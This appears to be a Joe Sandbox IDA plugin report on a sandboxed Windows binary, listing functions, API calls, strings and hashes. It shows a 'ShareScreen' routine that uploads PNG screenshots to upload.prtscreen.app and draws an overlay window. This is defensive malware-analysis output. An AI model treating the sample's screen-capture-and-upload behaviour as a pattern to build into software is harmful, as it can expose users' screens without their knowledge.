Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00429FDA: GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
Part of subcall function 00429FDA: _free.LIBCMT ref: 0042A011
Part of subcall function 00429FDA: SetLastError.KERNEL32(00000000), ref: 0042A052
Part of subcall function 00429FDA: _abort.LIBCMT ref: 0042A058

EnumSystemLocalesW.KERNEL32(0043361E,00000001,?,?,?,00433E89,004288B6,?,?,?,?,?,004288B6,?,?,?), ref: 004336FE

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 09bea0d5fc8a7ac0232088ae478983ca921333c5f8b05448977df893f917b1bf
Instruction ID: 821d79452342ac97f23861e37a1682b157815021ac8dec12c1aeaabc2f9b9d89
Opcode Fuzzy Hash: 09bea0d5fc8a7ac0232088ae478983ca921333c5f8b05448977df893f917b1bf
Instruction Fuzzy Hash: F5F0553A3002056BCB24AF36D81676B7F90EFC1711F0B405AEA05CB390C639EE42C798

Function 0040884E Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000885A,00407BC6), ref: 00408853

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 53ac2704a8bba1e46bab9c30778d50d17f1b177c7ca6e1a9663950c344de8130
Instruction ID: ad6cd33793ff177e26c1a97bcdfaaf15ed0ee74a4db3b70f6e58e0843b4d3390
Opcode Fuzzy Hash: 53ac2704a8bba1e46bab9c30778d50d17f1b177c7ca6e1a9663950c344de8130
Instruction Fuzzy Hash:

Function 00434006 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00434006

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 97a91999977145268991cb94d20d977037ee5da9a3bd67f81ad7e891684375e5
Instruction ID: 57096e83987943d11a695d840ef4b9745e934e74524bd49008d159cbb1976001
Opcode Fuzzy Hash: 97a91999977145268991cb94d20d977037ee5da9a3bd67f81ad7e891684375e5
Instruction Fuzzy Hash: 8BA011302002008B83808F30AA0830E3BB8BA8228230880BAA820CA830EB2080808A08

Function 0042F7A9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4389fefdb82e242a36a749b5815796590dd3bc47d50fa5f211b32a8e474e34d3
Instruction ID: 9ff07c895418d70444e43b684052c61642ef120a350858c0b1a6dc33159b47ec
Opcode Fuzzy Hash: 4389fefdb82e242a36a749b5815796590dd3bc47d50fa5f211b32a8e474e34d3
Instruction Fuzzy Hash: 7C325622E28F114DD7239634D922336A258AFB73C4F95D737F81AB5EA6EB68C5C34104

Function 004200B0 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 10eb6ad9f18822f7e8c3ea7503ec977a3658e0bde2d192af4a3a07642922d15c
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 3A91A6323090B34EDB694639A87807FFFE15A513A135A079FD4F3CA2C6EE18C965D624

Function 0042036B Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 072fd4b9295d823ad649f4240028795da44f56459bfe554f08819f50382463b0
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: FA9177723090B34EDB69863A947407FFFE15A523A135A079FD4F2CA2C3ED18C565EA24

Function 0041FDE9 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 016c75b75ed94ab23f96a9420165de4542413fc1615bc81a1f29f60e10ad71da
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 459179722091A30EDB2D463995344BFFFE15A523A131907BFD4F2CA2D2FD18C59AD624

Function 00425506 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668cb748b8881379049ca323eb43ec778a3b12b0326d54bfe81aad64eadb1978
Instruction ID: 54b2419bb8fa75273ec52a2396d09630ccd43638390023ed538ee0d9bc88596c
Opcode Fuzzy Hash: 668cb748b8881379049ca323eb43ec778a3b12b0326d54bfe81aad64eadb1978
Instruction Fuzzy Hash: 4C616371740F3866DA348928B895BBF2396DF51784FE4041BE846CB394E63C9D82824E

Function 0041FB3F Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: bfcad9548315bfeb718ba0120909cb2e420bc3bb84c0ec70a7de14491155707e
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 7A8185722080A349DB29463E94740BFFFE15A513A131A07BFD4F3CA2C5FE18D59AE624

Function 0041F720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7be15cc97862683fb3342e69a2213b500dfca99e82b66bbb41bd95b9888c4b28
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 9E1108BB21014243D614862DD9F85F7A395EAC632172C437BD1714B7D8D22AA9CF9908

Function 004020C0 Relevance: 54.5, APIs: 15, Strings: 16, Instructions: 274windownetworkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004020CA

Part of subcall function 00404624: __EH_prolog3_catch.LIBCMT ref: 0040462B
Part of subcall function 00404624: _strlen.LIBCMT ref: 0040463B

Part of subcall function 0040448C: std::locale::_Init.LIBCPMT ref: 004044B0

MessageBoxW.USER32(?,PNG open failed,ShareScreen,00000010), ref: 00402236
InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 004022D6
MessageBoxW.USER32(?,Failed to upload,ShareScreen,00000010), ref: 004024CF
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402501
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402526

Strings

FV@, xrefs: 004024F5
content-disposition: form-data; name="imagedata", xrefs: 0040212B
User-Agent: Gyazowin/1.0, xrefs: 00402320, 0040232E
PNG open failed, xrefs: 00402230
/upload.php, xrefs: 0040230A
upload.prtscreen.app, xrefs: 004022F5
Content-type: image/png, xrefs: 0040214C
Failed to upload (unexpected result code, under maintainance?), xrefs: 004023C3
----BOUNDARYBOUNDARY----, xrefs: 0040210A, 0040228C
X-Screen-Id, xrefs: 004023ED
Cannot set user agent, xrefs: 00402345
POST, xrefs: 0040230F
ShareScreen, xrefs: 0040222B, 004022D0, 004022D5, 004022E2, 00402340, 004023BE, 004024C4
Cannot configure wininet, xrefs: 004022E3
Content-type: multipart/form-data; boundary=----BOUNDARYBOUNDARY----, xrefs: 0040236A, 00402376
Failed to upload, xrefs: 004024C9

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Ios_base_dtorMessagestd::ios_base::_$H_prolog3_H_prolog3_catchInitInternetOpen_strlenstd::locale::_
String ID: ----BOUNDARYBOUNDARY----$/upload.php$Cannot configure wininet$Cannot set user agent$Content-type: image/png$Content-type: multipart/form-data; boundary=----BOUNDARYBOUNDARY----$FV@$Failed to upload$Failed to upload (unexpected result code, under maintainance?)$PNG open failed$POST$ShareScreen$User-Agent: Gyazowin/1.0$X-Screen-Id$content-disposition: form-data; name="imagedata"$upload.prtscreen.app
API String ID: 2012077995-3379884783
Opcode ID: c4f169c05036fdc5963b5069e08621dd19d6c60b0bbab96385429a071b9f8c1d
Instruction ID: 10959883eb4a766b779146eb7c0f601ed9e8b913fbba4deb13fd550078c6382f
Opcode Fuzzy Hash: c4f169c05036fdc5963b5069e08621dd19d6c60b0bbab96385429a071b9f8c1d
Instruction Fuzzy Hash: D2B14CB0900618AAEB20DB11CC85FEF7778AF54305F1045EAE509B21D1EBB95F89DF68

Function 00401694 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 004016CF
GetClientRect.USER32(?,?), ref: 004016E4
GetDC.USER32(?), ref: 004016EB
CreateSolidBrush.GDI32(00646464), ref: 004016FE
SelectObject.GDI32(00000000,00000000), ref: 00401712
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040171D
SelectObject.GDI32(00000000,00000000), ref: 0040172B
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040173E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401749
MulDiv.KERNEL32(00000008,00000000), ref: 00401752
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 00401776
SelectObject.GDI32(00000000,00000000), ref: 00401784
SetBkMode.GDI32(?,00000001), ref: 00401801
SetTextColor.GDI32(?,00000000), ref: 00401810
_wcslen.LIBCMT ref: 00401819

Strings

Tahoma, xrefs: 00401758

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 1223fc8013177a3d8dce3ed62d15961f0c73a8633faeae8db04529c7c4a9f133
Instruction ID: 5aa4ba0156cf6f5b67213301b552e19b5794437af0c8223dc64924f130262650
Opcode Fuzzy Hash: 1223fc8013177a3d8dce3ed62d15961f0c73a8633faeae8db04529c7c4a9f133
Instruction Fuzzy Hash: 4071FCB2900228AFDB229F64DD85FAE77BCEF08750F0051A5F609E6151DA74AF80CF54

Function 0040133E Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 131registrywindowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00000084), ref: 00401368
LoadCursorW.USER32(00000000,00007F03), ref: 00401379
RegisterClassW.USER32(?), ref: 00401395
LoadIconW.USER32(00000000,00000084), ref: 004013B6
LoadCursorW.USER32(00000000,00007F03), ref: 004013C3
GetStockObject.GDI32(00000000), ref: 004013C9
RegisterClassW.USER32(00000003), ref: 004013E0
GetSystemMetrics.USER32(0000004C), ref: 004013EA
GetSystemMetrics.USER32(0000004D), ref: 004013F0
GetSystemMetrics.USER32(0000004E), ref: 004013F6
GetSystemMetrics.USER32(0000004F), ref: 004013FD
CreateWindowExW.USER32(080000A8,SHARESCREEN,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401428
MoveWindow.USER32(00000000,00000000,00000000,?,?,00000000), ref: 0040143F
ShowWindow.USER32(00000000,00000005), ref: 00401448
UpdateWindow.USER32(00000000), ref: 0040144F
SetTimer.USER32(00000000,00000001,00000064,00000000), ref: 0040145F
CreateWindowExW.USER32(08080080,SHARESCREENL,00000000,80000000,00000064,00000064,0000012C,0000012C,00000000,00000000,00000000,00000000), ref: 00401482
SetLayeredWindowAttributes.USER32(00000000,000000FF,00000064,00000003), ref: 00401496

Strings

SHARESCREENL, xrefs: 004013D9, 00401478
SHARESCREEN, xrefs: 0040138E, 00401412

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Window$LoadMetricsSystem$ClassCreateCursorIconRegister$AttributesLayeredMoveObjectShowStockTimerUpdate
String ID: SHARESCREEN$SHARESCREENL
API String ID: 944809269-564793041
Opcode ID: 7c195b5fe70c13916575298c6f5f9c639463d88e28b1118a61e23d066b599905
Instruction ID: cdb979c221ebc3cee940444ca646c0ed61fef4484997c587a45241fcfdfc4146
Opcode Fuzzy Hash: 7c195b5fe70c13916575298c6f5f9c639463d88e28b1118a61e23d066b599905
Instruction Fuzzy Hash: BE41BFB1D41319BEE7109FA59C49FAFBABCEB89714F10416AF604F6250D7B449048FA8

Function 004265FC Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042666C
_free.LIBCMT ref: 00426682
_free.LIBCMT ref: 00426693
_free.LIBCMT ref: 004266A4
_free.LIBCMT ref: 004266BB
GetCPInfo.KERNEL32(?,?), ref: 00426703

Part of subcall function 0042E7EE: _free.LIBCMT ref: 0042E859

_free.LIBCMT ref: 004268AF
_free.LIBCMT ref: 004268C2
_free.LIBCMT ref: 004268D0
_free.LIBCMT ref: 004268DB
_free.LIBCMT ref: 0042691D
_free.LIBCMT ref: 00426925
_free.LIBCMT ref: 0042692D
_free.LIBCMT ref: 00426935
_free.LIBCMT ref: 00426943

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: d97d743489df7cb8cc39cde085d93e6d5d30ec1b41acc042d699f36689cb8bbb
Instruction ID: 8d1fe5c8e8e40cb34a36c0926384f4932146f4ff3bedbedc420eca6b1969c00b
Opcode Fuzzy Hash: d97d743489df7cb8cc39cde085d93e6d5d30ec1b41acc042d699f36689cb8bbb
Instruction Fuzzy Hash: E5B1B1B1A002259FDB109F65D881BEEBBF4FF08304F55406EF899A7342DB799841DB68

Function 00432A3D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00432A81

Part of subcall function 00431DD0: _free.LIBCMT ref: 00431DED
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431DFF
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E11
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E23
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E35
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E47
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E59
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E6B
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E7D
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431E8F
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431EA1
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431EB3
Part of subcall function 00431DD0: _free.LIBCMT ref: 00431EC5

_free.LIBCMT ref: 00432A76

Part of subcall function 0042B471: HeapFree.KERNEL32(00000000,00000000,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?), ref: 0042B487
Part of subcall function 0042B471: GetLastError.KERNEL32(?,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?,?), ref: 0042B499

_free.LIBCMT ref: 00432A98
_free.LIBCMT ref: 00432AAD
_free.LIBCMT ref: 00432AB8
_free.LIBCMT ref: 00432ADA
_free.LIBCMT ref: 00432AED
_free.LIBCMT ref: 00432AFB
_free.LIBCMT ref: 00432B06
_free.LIBCMT ref: 00432B3E
_free.LIBCMT ref: 00432B45
_free.LIBCMT ref: 00432B62
_free.LIBCMT ref: 00432B7A

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4b6158787bc378e001405ad2319fa1904f2ed29f3d86d118c7ea13d83fba6877
Instruction ID: 65e13d8a37cbd5ebbd7db3116c53a035eb9dc23bf05bc90b86fc2da7b113c282
Opcode Fuzzy Hash: 4b6158787bc378e001405ad2319fa1904f2ed29f3d86d118c7ea13d83fba6877
Instruction Fuzzy Hash: AE316C31600611DFEB20AE39E981B67B3E8EF04314F54945BE888D7266DFB8AC80D658

Function 00431ECE Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431F16
_free.LIBCMT ref: 00431F3A
_free.LIBCMT ref: 00431F47
_free.LIBCMT ref: 00431F6C
_free.LIBCMT ref: 00431F79
_free.LIBCMT ref: 00431F82
_free.LIBCMT ref: 00432260
_free.LIBCMT ref: 00432268

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
